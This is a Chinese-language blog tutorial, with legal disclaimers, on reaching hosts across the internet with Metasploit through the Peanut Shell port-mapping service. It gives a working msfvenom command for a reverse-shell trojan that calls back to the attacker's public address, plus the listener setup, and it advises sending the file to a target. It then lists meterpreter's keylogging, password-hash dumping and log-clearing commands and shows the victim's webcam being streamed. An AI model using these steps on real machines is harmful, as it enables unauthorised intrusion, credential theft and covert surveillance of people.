利用花生壳实现MSF的外网渗透「入侵外网主机」并监视摄像头
此教程本意为基础网络安全教学和带读者认识恶意软件的危害,无不良向导,禁止用于违法违规操作,请严格遵循《中华人民共和国计算机信息系统安全保护条例》否则后果自负!
# 0x01 引言
上期我们介绍了如何使用安装和配置花生壳
[postsbox post_id="202"]
本期我们来讲解如何利用花生壳的内网穿透实现MSF外网渗透
# 0x02 正文
首先打开花生壳(我这里用的是Mac,有客户端,如果是Kali或者其他Linux发行版直接用网页端就好了)
添加映射 ——> 填写我们的内网IP ——> 端口我这里写的 4444 (注意肯定是没被占用的)
通过 域名诊断 或者 ping 域名 的方式,得知我们的外网IP 还有 端口号, 这里记下来。
然后使用MSF生成木马监听外网端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=外网IP LPORT=外网端口 -f exe > shell.exe
运行后等待完成后,我们可以在主目录中发现我们生成的木马文件
此时我们启动MSF控制台:msfconsole 等待启动成功后,输入以下内容:
use exploit/multi/handler 选择侦听模块
set payload windows/meterpreter/reverse_tcp 设置攻击荷载(与我们之前生成木马的荷载一样)
set lhost 内网监听IP 设置监听的内网IP
set lport 内网监听端口 设置监听的内网端口
exploit 开始攻击
然后我们把我们生成的木马文件发送给我们的靶机,我这边用关了杀软的win10物理机
并不在同一个网络下,但是看左边控制台 我们也成功连接到会话
此时便可为所欲为了:输入help可得知大概功能如下(直翻译了一部分[好了],感兴趣可以自己去看看)
Core Commands
=============
Command Description
------- -----------
? Help menu 帮助菜单
background Backgrounds the current session 当前会话背景
bg Alias for background 背景别名
bgkill Kills a background meterpreter script 删除后台meterpreter脚本
bglist Lists running background scripts 列出正在运行的后台脚本
bgrun Executes a meterpreter script as a background thread 执行一个meterpreter脚本作为后台
channel Displays information or control active channels 显示信息或控制活动通道
close Closes a channel close关闭通道
detach Detach the meterpreter session (for http/https) 卸载meterpreter会话(针对http/https)
disable_unicode_encoding Disables encoding of unicode strings disable_unicode_encoding禁用unicode字符串编码
enable_unicode_encoding Enables encoding of unicode strings enable_unicode_encoding启用unicode字符串编码
exit Terminate the meterpreter session exit终止meterpreter会话
get_timeouts Get the current session timeout values get_timeouts获取当前会话超时值
guid Get the session GUID guid获取会话guid
help Help menu 帮助菜单
info Displays information about a Post module 显示Post模块信息
irb Open an interactive Ruby shell on the current session 在当前se上打开一个交互式Ruby shell
ssion
load Load one or more meterpreter extensions 加载一个或多个仪表扩展
machine_id Get the MSF ID of the machine attached to the session 获取连接到session的机器的MSF ID
migrate Migrate the server to another process 将服务器迁移到其他进程
pivot Manage pivot listeners 管理pivot监听器
pry Open the Pry debugger on the current session 打开当前会话的pry调试器
quit Terminate the meterpreter session quit终止meterpreter会话
read Reads data from a channel read从通道中读取数据
resource Run the commands stored in a file resource执行保存在文件中的命令
run Executes a meterpreter script or Post module 执行meterpreter脚本或Post模块
secure (Re)Negotiate TLV packet encryption on the sessi
on (Re)在sessi上协商TLV报文加密
sessions Quickly switch to another session 快速切换到另一个会话
set_timeouts Set the current session timeout values 设置当前会话超时值
sleep Force Meterpreter to go quiet, then re-establish
session 睡眠迫使计量器安静下来,然后重新建立
会话
ssl_verify Modify the SSL certificate verification setting 修改SSL证书验证设置
transport Manage the transport mechanisms 管理传输机制
use Deprecated alias for "load" 使用已弃用的别名“加载”
uuid Get the UUID for the current session 获取当前会话的uuid
write Writes data to a channel 向通道写入数据
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current pr
ocess
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target pro
cess
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes比如我们监视对方摄像头:
在meterpreter中输入 webcam_stream 便会直接通过默认浏览器打开由对方摄像头启动的监视画面
# 0x03 后记
综上所述,我们平时不用的电脑摄像头能封住还是封住比较好,这也只是功能中的冰山一角
手机尽量也是用升降摄像头,因为同理,也可以实行监听。并不是说我们不下载这种木马软件就可以,我们需要时刻警惕,因为木马软件很多时候都会伪装成正常软件并且进行 免杀 等操作让杀毒软件难以发现,从而对我们的通信设备进行窃取,破坏,造成不可估量的损失。
还有一个最重要的点便是:入侵别人的计算机和信息存储设备均属于违法行为,本教程旨意为让读者了解清楚木马软件的危害,请读者们自觉遵循《中华人民共和国计算机信息系统安全保护条例》,否则造成的后果将自行承担。
阅读剩余
版权声明:
作者:admin
链接:https://www.denceun.com/archives/220
文章版权归作者所有,未经允许请勿转载。
THE END